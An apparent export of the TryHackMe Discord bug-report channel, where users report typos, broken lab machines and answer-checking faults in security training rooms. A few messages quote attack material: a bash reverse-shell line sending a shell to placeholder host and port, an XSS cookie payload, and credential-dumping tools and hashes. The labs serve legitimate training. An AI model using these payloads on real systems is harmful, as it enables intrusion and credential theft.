#room-bugs

1 messages Β· Page 17 of 1

eternal summit
#

That's just answer tolerance.

#

Refresh the page.

wild bramble
#

worked πŸ™‚

#

thanks

final loom
#

Found a trivial grammar mistake

Mistake: "For this reason it's usually good practice to run an Nmap scan with with --top-ports <number> enabled."
Room: https://tryhackme.com/room/furthernmap
Task: 7 - [Scan Types] UDP Scans
Location: 4th paragraph, second "section" of the task

eternal summit
#

@obsidian kiln

obsidian kiln
#

Whoops

#

Fixed

#

Thanks @final loom

final loom
#

No problem! Not trying to be a grammar nazi or anything, just want to help πŸ™‚

obsidian kiln
#

Haha, yeah, I'm a stickler for grammar myself. Always happy to have errors pointed out πŸ‘

tawdry obsidian
atomic cloak
#

Room LinuxCTF

candid canyon
tawdry obsidian
twin tapir
#

That module is a mess

#

It works well when it works

tawdry obsidian
twin tapir
#

That sounds like an issue with your empire install rather than module specific

tawdry obsidian
#

[Version] 3.6.3 BC Security Fork

twin tapir
#

@candid canyon would know better than me

candid canyon
#

They should both be running, I've had both of those running recently without an issue. What version of PS is on the target box?

eternal summit
tawdry obsidian
candid canyon
#

What type of box is this, it's just that version .1 seems really odd.

tawdry obsidian
candid canyon
#

Are you running inside of a meterpreter session? Msfconsole as the name just wouldn't show up until you had metasploit somewhere.

#

@warped ibex might be able to help me out. This is a new one for me lol

tawdry obsidian
candid canyon
#

Yeah that's what I was trying to see with your response but that raised more questions.

#

But because those modules have embedded compiled code you have to run in a more modern version of PowerShell.

tawdry obsidian
twin tapir
#

Wait this is on the box in the room right?

#

I think blue is a windows 7 box it might not be running powershell 4. I wonder if that’s the problem but then again no one has reported that yet?

tawdry obsidian
candid canyon
#

Windows 7 SP1 should have a flavor of PowerShell 5. It was added in SP1, my mistake.

twin tapir
#

hmmm that might the problem. Can you run β€œ$PSVersionTable” for me?

tawdry obsidian
twin bay
#

mitre room
Task 2 - "e.i" instead of "i.e"
Task 3 - Grammar / Typo - "Instead of Mimikatz, what OS Credential Dumping tool is does this group use?"

warped ibex
#

Huh @tawdry obsidian it says your PS version is 2 which the modules aren't compatible with. Did you run a downgrade module with metepreter?

#

@twin tapir and @candid canyon are right. Windows 7 should have a flavor a PS 4 which should work with those modules

warped ibex
#

btw Get-Host returns information on the program hosting the powershell runtime so when you are doing weird offensive things it's not the most reliable source of info

livid rune
#

https://tryhackme.com/room/windows10privesc - Task 11 SAM - on the version of Kali I installed recently, the hashdump.py works correctly from /usr/share/creddump7 so that info may need changing (python-crypto not found with apt install either so may have been moved or on a non standard repo?)

solemn topaz
acoustic fjord
#

that's how it always worked, the difference is now it's in your local timezone

solemn topaz
acoustic fjord
#

However, this only effects new signups πŸ€”

solemn topaz
#

that's strange part tbh , I registered before that change and do not have countdown anymore .

acoustic fjord
#

ah the countdown seemed to disappear for eveyrone after that update

#

I just wing it with the timing tbh kekw

solemn topaz
#

πŸ˜„

#

btw do you know what is and how does work 45 day streak 5% swag off ? Couldn't find more info on page about it ?!

acoustic fjord
#

so after you reach the 45 day streak you can send an email to support@tryhackme.com with info that you reached it and get a 5% discount on thm merchandise

solemn topaz
#

ohh ok , just hit 45 day streak , thanks mate and Happy New Year

acoustic fjord
dense rapids
#

so after you reach the 45 day streak you can send an email to support@tryhackme.com with info that you reached it and get a 5% discount on thm merchandise
@acoustic fjord my streak rate 71 blobheart blobheart

radiant karma
#

Not necessarily a bug but the forensics room has a fair number of spelling and grammatical mistakes

eternal summit
radiant karma
#

No worries, I'll sign on to Discord on my desktop

#

https://tryhackme.com/room/forensics

"What is the last directory accessed by the user? (Just write last folder name as it is?" - Missing end bracket

"Dig little more..." - Dig a little more

"There are many suspicious open port, which is it ?(protocol:port) - ports instead of port and removal of the space before the question mark The hint for this question should also be corrected to "write the first one"

"In lats task you have identified malicious processes, so lets dig into them and find some IOC's. you just need to find them and fill the blanks (You may search them on VirusTotal for more details πŸ™‚" - lats needs to be corrected to last and the you in the second sentence needs to be capitalised

#

There might be a couple more but I'm second guessing myself a bit

eternal summit
#

There's something super weird there

radiant karma
#

Just thought it might be worth mentioning

eternal summit
#

Yeah it's an ancient room wow

radiant karma
#

It's listed in the new Cyber Defence path, so it has been resurrected πŸ˜„

eternal summit
#

@dusky junco This room looks like it needs a serious overhaul IMO

dense geyser
#

80 doesnt work

eternal summit
kindred sage
eternal summit
kindred sage
#

ohhh damn thanks mate πŸ˜„

subtle imp
#
Room: Break it
Task 1

[Insane] 

The text is inside the Pastebin https://pastebin.com/kKkr9SJL

#

pastebin not found :d

hazy tiger
#

Hey @subtle imp I have the text which was inside of the patebin, would you like me to DM it to you? In the meantime, I'll try to get it sorted :p

subtle imp
#

yeh sure

hazy tiger
#

Awesome

velvet bramble
eternal summit
#

Wait a little longer for the VM to fully boot

#

There's another service that hasn't properly started there

velvet bramble
#

ah okey thanks πŸ™‚

#

yeah, now it works

foggy fable
#

I think there is a issue in fundamentals of linux room exactly in vip challenge room there is a mp3 file names flag32.mp3 I think that file is corrupted even though I downloaded the file to my web attack box there was no sound output

obsidian flame
foggy fable
#

because I could hear the error sounds

obsidian flame
#

ohhh, i think i might've misread what you said! Now it makes sense

foggy fable
#

πŸ˜„

tacit mason
#

Hey guys! I think a found a bug on the biohazard room

#

*but

smoky sinew
#

It may not be that important though

hexed kindle
#

Room Network services 2, task 9, "select module()" should be "select version()"

timber pine
#

i think there might be a typo in the answer field in the new room windowseventlogs.
section: 7
question: What is the Execution Process ID ?
I think the the first number of the answer might be typed double

wheat fractal
ornate wigeon
twin tapir
#

@ornate wigeon that room is undergoing an overhaul now no point in updating it

ornate wigeon
#

oh damn!

#

okay okay thanks for letting me know! @twin tapir

wheat fractal
#

When does the splunk overhaul take effect?

glad badger
wheat fractal
#

@glad badger is it still of value to do the room?

glad badger
wheat fractal
#

Fair enough thanks

proper surge
#

I think there may be a room bug in the room "CC: Pen Testing" (/room/ccpentesting). Specifically, in Task 18 "What is the value of the flag?". Using sqlmap as instructed, the current box I'm targeting ("Machine 3", 10.10.108.80) lists no entries in either the "msg" or "lol" tables of the "tests" database when I dump it. However, in looking at an online walkthrough, the flag should be listed under the "flag" column of the "lol" table. Did the database data for this box accidentally get adjusted?

eternal summit
#

It's buggy, but the flags are there. It's something with sqlmap

proper surge
#

ok, thanks for the quick reply!

wheat fractal
#

dogcat has only port 22 open?

#

nvm, it took longer to boot http server

lethal dagger
#

First image on task8 module

dapper rose
#

Hello, the Windows Event Log room probably has a bug in Task 7 (Question 6) the date in the evtx file does not work as an answer to the question.

civic brook
#

@dusky junco not sure if it just a single instance or something with the box, but the machine I had running in Investigating Windows kept trying to install .NET Framework 3.5

glad badger
glad badger
#

Thank you. I will ask why it isn't working and get back to you. @dapper rose

wise ore
#

Hello every one, i am doing OWASP 10 room (https://tryhackme.com/room/owasptop10) and on task 20 ( [Severity 7] Cross-site Scripting ) and 4th question i use this script (||<script>alert(document.cookie)</script>||) but it doesn't show any pop-up and also shows Loading... instead of comments

what is the problem?

hazy tiger
#

Please avoid pinging THM staff

#

@wise ore

pallid tide
#

If I think the wording of a question in a room is misleading, should I post it here?

obsidian kiln
#

Yes πŸ™‚

pallid tide
#

So, on "introductory researching/vulnerability searching" the last question is about "a 2020 buffer overflow in the sudo program". Although it's true that there's a pair of 2020 entries in the exploit DBs, the CVE is actually a 2019 one.

eternal summit
#

It's a 2020 buffer overflow

#

With a CVE allocated in 2019

pallid tide
#

Ok, so the CVE was discovered in 2019, but the exploit was written in 2020, correct? Makes sense.

eternal summit
#

The vulnerability was published in 2020, in like January @pallid tide

#

The exploit doesn't matter

pallid tide
#

Ok, thanks for clarifying.

reef oxide
#

I'm messaging you because of this.

obsidian kiln
mild apex
#

Hey I think I found a bug over at the Linux Fundamentals 3 room.

vocal zinc
#

Refresh the page

#

answer tolerance

reef oxide
#

Does 'Relevant' crash whenever using something like winPEAS.bat for anyone else?

lethal dagger
#

AdventOfCyber 2019 [Day 21] Reverse Elf-ineering
aa got r_bin_file_hash: file exceeds bin.hashlimit and Invalid address from.. something wrong with my radare 4.3.1.

#

tried on AdventOfCyber 2020 with radare version2. didn't have the problem

dusky junco
wheat fractal
#

^ Moved from room-hints to room-bugs because i feel like this now belongs here. Given that other users (seemingly) are facing the same issue.

#

So. i tried rebooting and from the looks of it, the size of the log varies. Thus (perhaps, not an expert) it looks like this also changes the number of event logs.

#

This is the size i get when booting the machine. I noticed this size differs from the very first time i booted the machine (but i didn't screenshot that, and the machine crashed).

twin tapir
#

That’s due to powershell constantly adding events

#

@obsidian kiln / @dusky junco you wanna just delete that question for now so that it can make it easier for users

static gull
#

In Corp room, the command to find the SPNs is giving me an error

#

However even the writeups use that exact commands

upper venture
#

Idk if this is a bug or what. But to me this looks like there are two open ports (21 and 80) but THM says that there are none open

sonic willow
#

room? question?

wild bramble
#

yes happend me

twin tapir
#

from what room

wild bramble
#

idk

#

it was a room

#

i tried to try all numbers and it worked like tha

#

scanners showed 2

#

answer was 1

upper venture
#

network services, enumerating Telnet, question 4

wild bramble
#

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

#

@upper venture

upper venture
#

that one

#

I do nmap [ip] -A then get what I postd

wild bramble
#

thats wierd

#

i got 0 ports

twin tapir
#

are you sure the answer was actually 2 and regex just accepted 1?

#

always refresh whenever you think an answer is off

upper venture
#

Huh

#

That is weird

#

Could it be because I have another nmap running?

wild bramble
#

are u sure u deplyed the correct machie

upper venture
#

Well

#

I am pretty stupid

wild bramble
#

why?

upper venture
#

LMao I had the FTP one deployed

#

My bad

wild bramble
#

u got it

upper venture
#

Thanks for working it through with me guys

wild bramble
#

πŸ™‚

amber onyx
wild bramble
#

It is correct

#

just refresh the pae

#

@amber onyx

blissful urchin
#

Hi,
I think there is a bug in the following room.
Room: ZTH: Obscure Web Vulns
section: [Section 3 - JWT]: Challenge!
Descr:
The purpose is to sign the jwt token with the found public key.
Bug:
When visiting the site, you get a JWT token that you need to alter and sign with a public key. This token refreshes each time you refresh the page.
If you just paste this token for verification you get the flag, whiteout doing any altering.

tiny ginkgo
#

https://tryhackme.com/room/introexploitdevelopment The target machine in this room doesn't seem to work at all. The homepage doesn't loads completely after logging in. I've waited for more than 30min for the server to respond and refreshed the page several times but it doesn't budge at all. I was trying to complete this room previously last month but had the same problem

hazy tiger
#

Are you connected to the VPN

muted aspen
plucky jay
hazy tiger
#

Does the link work

plucky jay
hazy tiger
#

@dusky junco Cmnnnnnn

dusky junco
#

Thanks @hazy tiger (:

#

Resolved (: was an editor bug

hazy tiger
#

Thanks CMN

tiny ginkgo
plucky jay
dusky junco
#

Thanks for that @plucky jay I've updated that too

#

Good catch -- that's an oversight on my part

plucky jay
#

Welcome :-)

dusky junco
#

I've updated -- a refresh should do the trick

plucky jay
#

Yes, confirmed that it changed

#

Gonna be cheeky. Having reported 4 (qualified) bugs in the past few weeks. At what point do i earn the 'Act of Kindness' badge? :-))))) @dusky junco

dusky junco
#

Hehe, we reserve that badge for those who do giveaways and the likes. The only reward outside of the bug bounty programme is a pat on the back and appreciation from us (:

#

Although let me take a look back and I might pop you a DM (:

plucky jay
#

I understand! Worth a shot ^_^ Thank you!

reef oxide
# dusky junco Yup! Appreciated. Thanks for the pnig. I've taken note of this

Relevant seems to just stop responding after some time. I originally thought that this was because I was running winPEAS, winenum, or any of the other privesc scripts. I started manually entering commands, and he machine stopped responding. I had over 30 minutes left according to the room page. I hope this info helps in some way.

hazy tiger
#

The site was taken down iirc

sour glacier
#

Maybe someone knows Rudolphs breached password

hazy tiger
#

Room & Task? @sour glacier

#

Ah I got it

sour glacier
#

Advent of Cyber: day 14 Where's Rudolph
found the video and he said the correct answer

glad badger
#

Also please delete the picture @sour glacier as it contains answers.

hazy tiger
#

tim

#

It doesn't need to be deleted

#

It's not in the help channels + has spoiler tags

sour glacier
#

for greater good

hazy tiger
#

It's meant to be to demonstrate the issue

sour glacier
#

Thanks for your time @hazy tiger

glad badger
#

It's a known issue. I've requested it previously for the question to be annulled.

sour glacier
#

deleted the picture @glad badger all safe

teal barn
#

Task 6, the magic MACHINE_IP is not replaced by the IP address after deployment is completed.

woeful hawk
#

I count at least 4 of us having no luck with task 9 of https://tryhackme.com/room/windows10privesc during the last couple of days. There's a user name but the question claims there should be a password too in the registry yet it is not there.

muted aspen
vital mauve
#

Hi #room-bugs Im having an issue on room https://tryhackme.com/room/networkservices, on task 6 you can deploy a machine which on task 7 you can exploit, basically when connecting via telnet to ip and port 8012 you should get a message saying "skidy's backdoor" I got it the first time I was doing the task, but in later machines deployed I am not getting it anymore so I assume it is a bug and not sure where to report it. If anyone could test just in case that would be great

hazy tiger
#

That room link doesn’t seem to work

#

As well as that

#

Please run the VPNscript to make sure your VPN isn’t causing any issues

#

!vpnscript

tropic flameBOT
vital mauve
hazy tiger
#

Are you able to type at all

#

Like .help

vital mauve
#

I can but dont get anything

#

you get something?

latent vessel
latent vessel
vital mauve
vital mauve
#

ok, recreated the machine for 3rd time, now it works

#

very weird

#

thanks for your time guys!

scarlet needle
#

Hey,
Idk if this is a bug but I notice this in OWASP top 10 (Task 28)

The order of the text and images is wrong.

digital stratus
void sleet
wheat fractal
#

hello all, is there a problem with the relevant box? i was working on it and suddenly no connection anymore? this happened before.. i tried to ping it but unreachable.. im connected with the tryhackmebox

glad badger
ionic agate
#

I've tried terminating and restarting the machine with no luck

oblique hemlock
static gull
#

I'm in the Authenticate room and the page on port 5000 doesn't give me a cookie... it did before and it expired and I restarted it and now I don't get one

wheat fractal
#

Hello, I don't know If Im in the right channel ( tell me if it's the case )

I'm currently doing the " AttacktiveDirect " machine and, at Task 7 " Elevating Privileges " at the question "What is the Administrators NTLM hash?" It keeps telling me that I put the wrong answer while it's the correct one, I've also checked many writeups on YouTube and it seems that it's only happening to me.. what can I do to validate the box ?

Thanks !

viral cobalt
#

refresh the page and try re-submitting

#

it should start and end with
0e03[snip]bcb4fc

wheat fractal
glad badger
#

Did you extend the room, it expires after 2 hours? Same with the AttackBox, it has to be extended after 2 hours.

wheat fractal
glad badger
#

Which room was it?

wheat fractal
#

relevant

glad badger
#

Could be many things. Try re-deploying both and see if it happens again.

wheat fractal
static gull
plucky nimbus
#

The room Alfred is missing the root flag. Can't complete the room.

stuck stirrup
plucky nimbus
#

I tried a ps migrate and also tried getsystem, there is no flag. I'll try it again after work I guess.

west flax
fringe cape
#

I've got a bug in History of Malware room , in spite of entering wrong spelling it's declared as a correct answer skidy

topaz thorn
#

Refresh the page

#

It will correct it

fringe cape
#

thenksss @topaz thorn

wheat fractal
#

good morning: relevant room, same bug as yesterday, its suddenly down again. host unreachable.

hazy tiger
#

Are you connected to the VPN?

wheat fractal
#

atatckmachine

hazy tiger
#

Have you used -Pn while scanning with nmap?

wheat fractal
#

0 host up

hazy tiger
#

screenshot

wheat fractal
dusky junco
#

How long was the VM for relevant up for? @wheat fractal do you remember the IP address

wheat fractal
#

about 1,5 hr, IP 10.10.182.8

dusky junco
#

Thanks bare with me

wheat fractal
#

a little bit after 1 hr it just shuts down, and loose all connection.. same yesterday

#

time to lunch anyway πŸ˜‰

dusky junco
#

Ah yeah, I see the issue. It's licensing issues which I thought I fixed throughout the week.

#

I'll get this resolved -- thanks @wheat fractal & @hazy tiger

hazy tiger
#

Thanks CMN

#

Sorry I was dealing w/ something :3

dusky junco
#

Not at all -- all on me (:

wheat fractal
#

okay thanks, thanks all!

wheat fractal
# dusky junco Not at all -- all on me (:

btw i have restarted the room, and there seems to be all the time a connection error after 30% scanning.. when doing a gobuster scan on the ip/correct port, which makes you discover the share directory.

#

needless to say that you get stuck then, for hours haha.. as this is they way in..

blazing raven
obsidian kiln
#

Fixed @blazing raven πŸ‘

modest mica
verbal sedge
obsidian kiln
#

Oops

#

Thought I'd already got all of those

#

Gimme a sec

#

Fixed

modest mica
#

thank you

cerulean hill
#

While a small amount of users had issues with EnterPrize I improved the response for enumeration and fixed the two unintended ways to root πŸ™‚

hazy tiger
#

Wow, you go!

obsidian kiln
cerulean hill
obsidian kiln
#

Should be fine, but just to be sure, mind giving the original tester a ping to just have a quick run through it again? πŸ™‚

#

Protocol as much as anything else πŸ€·β€β™‚οΈ

cerulean hill
heavy spade
#

@stuck stirrup if you wanna, go for testing it :)

stuck stirrup
#

Will do now

proper jasper
#

Could you share what the unintended routes found were please? Could be interesting to hear about - especially as they no longer work. @cerulean hill

slate parrot
#

@dusky junco Intro to Windows, Task 3, spelling error "Authentication method that assings a ticket in order for a user to login?" should be assigns

blazing raven
blazing raven
# obsidian kiln Fixed <@!738479958845948054> πŸ‘

Looks like there used to be a room called Learning Linux and one of the bonus tasks was to find root.txt. I'm guessing that room got split into 3 rooms but none of those rooms asks you to find root.txt. I think it would be best to remove the question, explain that we need to gain shell (but these is an intro lesson), or add the bonus back to the Learning Linux 3 part series

obsidian kiln
blazing raven
icy elbow
#

@dusky junco https://tryhackme.com/room/windows10privesc the VM teminates your session after an hour and you can't log back in.. "It's literally your job" as the meme goes. blobheart I was told to report this to you . Thanks

slate parrot
#

Not so much of a bug, but just a suggestion. The Task orders in the Rustscan room seems a little off. i.e., covering Rustscan scripting well before covering basic Rustscan usage. /cc @green steppe

wheat fractal
tiny ginkgo
clear kestrel
#

historyofmalware room task 8 -> a common file extension for executables was ".COM". Similarly to how a BATCH file or a .sh file would work, this extension allowed text files containing commands to be executable.

#

I think the .COM was not like sh or batch scripts but its like EXEs and ELFs which are binary not plain text scripts.

eternal summit
#

Well yes but no

#

It was both at different times

clear kestrel
#

yes

#

but my question is isn't saying this wrong that .COM will run like .sh or BATCH file taking plain text as input?

hazy tiger
#

Key word similarly

#

Similarly meaning that they execute commands

clear kestrel
#

Okay I got it

#

should improve my grammar... lol

eternal summit
#

They'll probably be binary files in this context

hazy tiger
#

It was meant to establish common ground for users who want a better understanding

tiny ginkgo
#

Room: introexploitdevelopment, Task 4. payload is a variable name but here in this example it is being used as a function name. There might be a mistake here I think.

obsidian kiln
charred summit
#

On rustscan, I think the answer to the second question in the quiz needs updating

hazy tiger
#

Would help if you provide screenshots and more reasoning

tiny ginkgo
#

Room: introexploitdevelopment, Task 4. The hint of the last question says that <&1 in the payload bash -i &>/dev/tcp/{lhost}/{lport}<&1 is to keep the shell running, but it's not quite true. <&1 is being used here to redirect the outputstream (which is logically the input of server computer coming from the other end of the tcp socket) to the inputstream of the bash shell.

obsidian kiln
#

I swear I already told him about that one

charred summit
#

The accepted answer threows an error and the repo states that the command has been updated

bitter onyx
obsidian kiln
#

Nah, not all rooms award points

maiden sorrel
maiden sorrel
tiny ginkgo
tiny ginkgo
#

Also the target machine in that room is very slow and the homepage just freezes and stops loading completely after logging in.

tiny ginkgo
#

Oh ..My mistake... didn't notice it.

maiden sorrel
tiny ginkgo
#

Oh okay.

remote hamlet
#

@dusky junco You have a small typo in the intro2winzq room. File Permissions, first line, "FIles" with a capitol "i".

remote hamlet
#

Also, for Built-in utilities, you are missing a space for "Performance Monitor -Using". Between the dash and the "U" in "using".

chilly igloo
#

Room: https://tryhackme.com/room/owasptop10
Task: 26
Step 2: Clicking on the "vim" anchor tag does nothing, the directions say to Then, left-click on the URL in "Exhange your vim" found in the screenshot below.
Resolution: Step 2 needs to be rewritten to say click on the feedback link, and the screenshot needs to be updated.

#

Either that or the vim link doesn't actually do anything. No cookie is being made as it says in the directions? It does make the cookie. encodedPayload is being made, but only after visiting and posting to the feedback page.

#

Tag me in your reply so i can come back to this later.

wheat fractal
muted aspen
oblique hemlock
#

yeah i could use that, however, mimikatz is not the way they describe in the task, hence my message. Thanks for linking it tho. Maybe i should have searched before typing my message

muted aspen
wheat fractal
#

Windows PrivEsc- shuts down after a bit more then an hour.. at least the remote connection

#

when the room has still enough time on it

pliant flint
#

Hi all, somebody tried to do OverPass 3 ?

hazy tiger
#

!rule 13

tropic flameBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

green steppe
#

thanks

slate parrot
green steppe
#

oh gnarly

tiny ginkgo
#

@maiden sorrel Room: introexploitdevelopment, Task 3, A bit of correction here. The second request in the ruby code in both the check() and exploit() is not a POST request, rather a GET request by default as the method is not specified, but using a POST request would also work fine for this scenario.

modest mica
eternal summit
#

Where did you get that IP from?

#

@modest mica

modest mica
#

It's from the deployed machine all other questions (except another Y/N I have already finished the room) were the right answer like number of open ports and such so it's not the wrong ip

eternal summit
#

I can't see it under Active Machine Information so I'm not sure...

#

But perhaps try actually pinging it with the ping command?

#

or @obsidian kiln is this security groups again?

obsidian kiln
#

Yeah, it's because Windows is considering the AttackBox to be on the same network

#

It's dumb

modest mica
#

ping command doesn't give output only shows first line : PING 10.10.24.186 56(84) Bytes of data.

eternal summit
eternal summit
modest mica
eternal summit
#

So that means the answer is no.

#

So I think(?) that's your question answered there?

modest mica
#

but the question asked to use what I have learned and ICMP and in the this room it showed the nmap way not the ping command that's why I got confused

eternal summit
#

Ok, so long story short

#

Windows firewall treats the attackbox slightly differently than if you pinged it from your own machine when VPN'd

#

And it doesn't respond to pings.

modest mica
#

Ok thanks.

civic brook
chilly igloo
#

I just copied and pasted the code from the input string? Never did the room, but i'm assuming thats what you were looking for?

civic brook
#

ya, works for me but should get a perm fix to it

chilly igloo
#

agreed

#

but i can confirm that the pastebin link is broken.

remote hamlet
remote hamlet
#

"Note that the arguments are separated by commas,..."

plucky jay
wheat fractal
wheat fractal
#

Nevermind πŸ˜‰ in the next step i got it out of the SAM with mimikatz πŸ™‚

dusky junco
last ore
#

how to submit bug?

hazy tiger
#

Room:
Task:
Bug:
Proof:

topaz thorn
#

works for me

last ore
#

you tried rn ?

topaz thorn
#

yep

last ore
#

i tried with different browsers but still not working

#

maybe issue my network

#

sorry

#

XD

topaz thorn
#

possible you're in a country that blocks soundcloud?

last ore
#

I'M FROM india

topaz thorn
last ore
#

ohh

wheat fractal
#

I think there is a problem with ZTH: Web 2 room. if I put anything in the credential it will log me in. πŸ‘€

tiny ginkgo
#

Room: linux1, Bug-type: Information mismatch. The task context says that the binary file outputs noot but in the example, it outputs Hello.

tiny ginkgo
twin tapir
#

small errors are fine to mention but in this case the screenshot didn’t match the question as it would just give away the answer it is an example rather than showing what is supposed to happen

tiny ginkgo
#

Oh okay.

#

Room: linux1, Task 8, There's a small typo here. Probably the sentence should be : These shortcuts work for every .....

plucky jay
gleaming jungle
#

Task 7. @obsidian kiln what do you think?

static elk
obsidian kiln
#

That can be made clearer though. Gimme a sec

gleaming jungle
#

@obsidian kiln Ok the apple man traceroute doesn't have the -T, thats why it drove me crazy

obsidian kiln
#

I, uh, just screenshotted the manual page for the Kali version

gleaming jungle
#

Yea, I should use the attack box but lazy wins πŸ˜†

obsidian kiln
#

No idea what's on the AttackBox -- that's Kali though

vapid glen
#

Grammatical issue on Intro2windows Authentication method that assings a ticket in order for a user to login? Should be assigns

hazy tiger
#

Would be helpful for the site staff if you could provide a screenshot, room link and task.

vapid glen
blazing raven
prime helm
#

OWASP Top 10 room by @ Ben
Machine From Task 21 OWASP10-A8-CMNatic

If one was to navigate to the http://MACHINE_IP/admin page without a cookie, then the flag was also shown
late wadi
# blissful urchin Hi, I think there is a bug in the following room. **Room:** ZTH: Obscure Web Vul...

I can confirm this bug. Just tried. I also receive "invalid syntax" on the THM attack box when I copy the python command:

python -c "exec("import base64\nimport binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('5c26be61ae3ΓΈc31ΓΈΓΈ96e2be5d7cbΓΈ6c2eΓΈ2ΓΈ5ΓΈ4ΓΈ1cac51ΓΈ24fefc1466afba273')).replace('=')")"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "<string>", line 3
print base64.urlsafe_b64encode(binascii.a2b_hex('5c26be61ae3ΓΈc31ΓΈΓΈ96e2be5d7cbΓΈ6c2eΓΈ2ΓΈ5ΓΈ4ΓΈ1cac51ΓΈ24fefc1466afba273')).replace('=')
^
SyntaxError: invalid syntax

eternal summit
#

It's a python2 script

#

Run it with python2.7

eternal summit
#

I mean that aint gonna fix it

wind meteor
#

I read that wrong...

#

sheesh...

late wadi
eternal summit
#

python used to be python2

#

It's a change that's super recent and doesn't apply to all machines

#

Many will have python be python2

late wadi
#

Got it πŸ™‚

static elk
#

Can someone confirm on whether the issues with the Windows PrivEsc room on the Beginner path are going to be investigated? I’m 99% of the way through that path and this last bit is killing me.

oblique hemlock
#

/room/rustscan claims that all you need is the helpmenu but it is not true. Because the answer for question 2: what switch enables quiet mode? and its answer (namely ||-q||) is not in the help menu. And rustscan doesn't have a man page. I read online that quiet mode has been renamed to greppable but it didn't accept -g either

blazing raven
alpine sparrow
#

Task 9 of the Network Services room 2 asks for the output of the "select module()" option for an exploit because this option is allegedly set by the default in the exploit, but it is really asking for the output of the "select version()" option. "select module()" simply returns an error as there is no database selected by default.

arctic socket
#

Hey guys I am currently doing the BLUE room and everytime I run the exploit it successfully runs the exploit but fails at the connection. I've refreshed my OpenVPN connection several times and I've also terminated and rebooted the target machine to no prevail.... any thoughts?

burnt granite
#

RustScan room Task 8 - quiet mode is no more; it was replaced by greppable mode in the latest version.

wheat fractal
blazing raven
teal barn
#

Ok saw it.

#

I'll work on it.

blazing raven
#

Did the entire room get reset? Now it says I haven't completed

hazy tiger
#

Yes

teal barn
#

Yes currently reseting it because there was people "cheating".

#

The hashes of the last task will be changed.

blazing raven
#

πŸ˜„ I learned from this site!!

#

I was wondering how it was possible that it was completed so quickly.

runic parcel
#

aww mang, was just about to get to Task 4

blazing raven
runic parcel
#

these things happen, am not mad

civic brook
#

was enjoying the room, it should be back once the changes are done

runic parcel
#

yup, very enjoyable room. Haiti is a beast of a tool

blazing raven
#

ya, i learned a lot of john. i want to learn more about those rules. a room about them would be awesome

teal barn
#

I'm very sorry for the disturbance. A cache leak spoiled the party. I'm re-working on last task.

crude kiln
#

@teal barn thanks its a good room

rotund fox
#

@teal barn please update the task where you have to cewl the "last word". First, the example.org is down atm and second, the output is random if the sites are updates, making it a quite difficult to guess.

gleaming shadow
#

it's also normally a static site that doesn't move

teal barn
#

@wheat fractal @blazing raven @runic parcel @civic brook @crude kiln @rotund fox
Room fixed and back online. Enjoy it!

civic brook
#

already back at it

remote hamlet
#

@lucid oasis Not sure if I could pester Dark about this or just you; There is an incorrect pluralisation on the Web Fundamentals pathway enrolment page.

#

@next bluff Swafyy, you've got a grammatical error in the Introduction to Django room. Task1 Django can automatically compile HTML code, therefore making it possible for anyone without any advanced knowledge in markup languages develop a website.
Should be "without any advanced knowledge in markup languages to develop a website"

glacial tree
#

@eternal summit Is the sentence "The public key is n and d, the private key is n and e." from your Encryption - Crypto 101 room's Task 6 correct? I was reading more about RSA on the blogpost you linked and MuirlandOracle uses (e,n) as public and (d,n) as private, and it makes more sense to me, so for about 5 minutes I got really confused because the letters seem to be reversed.

stiff notch
#

Google Dorking has a small typo. Task 3. Subpoint 3. One "(" is unclosed

#

Kudos to the room creator tho, loving the room

shut laurel
#

in windows privesc -> TASK11
python2 creddump7/pwdump.py SYSTEM SAM commands throws error on Kali inBrowser machine

#

struct.error: unpack requires a string argument of length 4

#

In VM i am not able to install python-crypto

#

Seems like the package is not available in the repository

#

I am not able to proceed further to get the HASH

static elk
#

I had this issue as well. Two bugs in the one room.

#

Would really appreciate some help from anyone who has managed to workaround the issues and get the admin hash.

viral cobalt
#

it's because creddump7 is built for Python2

#

make sure to run it with python3

static elk
#

It needs Python-crypto package and it can’t be installed as it is described in the room instructions hence the bug.

twin tapir
#

Impacket works so much better for this I have no clue why they’re using a deprecated tool

static elk
#

It’s one of the rooms on the Beginner path so if you are a beginner like me, it’s not a great experience. Think the room is quite old so probably just needs a review.

static elk
#

Managed to get the password now - I will stop posting πŸ˜‰

orchid dome
#

Strange things happening with Buffer Overflow Prep room

#

tried to run the sample pythoncode and got the program crashes as soon as it started..

#

on the first 100 mb. I certain there is an issue...Any help around ???

wind meteor
#

Hey so when enrolled in the Cyber Security path, The progress meter at the top reflects the current level of completion but rooms that I had already completed do not show as such in their individual progress meters. If you navigate to the room you can see that you have done it though. Small bug but figured I'd mention it.

vocal cypress
#

Found a bug in the Network Services Room. Task 3, first question about conducting a port scan accepts an answer if you put nothing in the space.

eternal summit
#

Platform bug not a room bug

fringe reef
#

In the room SmagGrotto there is a root flag in user shell

tiny loom
#

Ran in to some problems in Cicada-3301 Vol:1 - around question 6. I cracked the file. As I could not crack the hash, I looked at the write-ups. They seem to get the same result as I got (regarding the hash), but when I try to use the online resources I get no results. I then tried to hash the url the others found and I get a different hash (this hash then returns the correct url og cause).

sonic willow
strange plaza
#

hey hi guys

#

im just started linux fundamentals part 2

#

and stuck in connecting to ssh by putty

#

it says connection timed out

topaz thorn
tardy relic
#

hey!

#

as per the instruction provided in the room GoldenEye on getting reverse shell user must be able to download exploit via Simple python Server. But it is says permission denied.

verbal sedge
#

Try saving in another directory? /tmp for example.

tardy relic
#

thanks... i dint try saving it in tmp

slate parrot
#

@tough linden Hi there. It seems a number of users are struggling to get the reverse shell to connect on the WindowsPrivEsc:(AutoRuns) task. I've connected without authenticating, and with authentication, and nothing happens. Not sure if I missed anything ...

tough linden
#

@slate parrot let me check

slate parrot
#

Thank you πŸ™‚

tough linden
#

@slate parrot works for me

#

may take like, 10s after logging in

#

but it triggers

#

you're logging in as admin?

slate parrot
#

Nothing triggers for me β€” a search here shows other people having the same issue.

#

Logging in as user.

tough linden
#

try logging in as admin

slate parrot
#

There are no admin creds for that box (at least until Task 7)

tough linden
#

ah

slate parrot
#

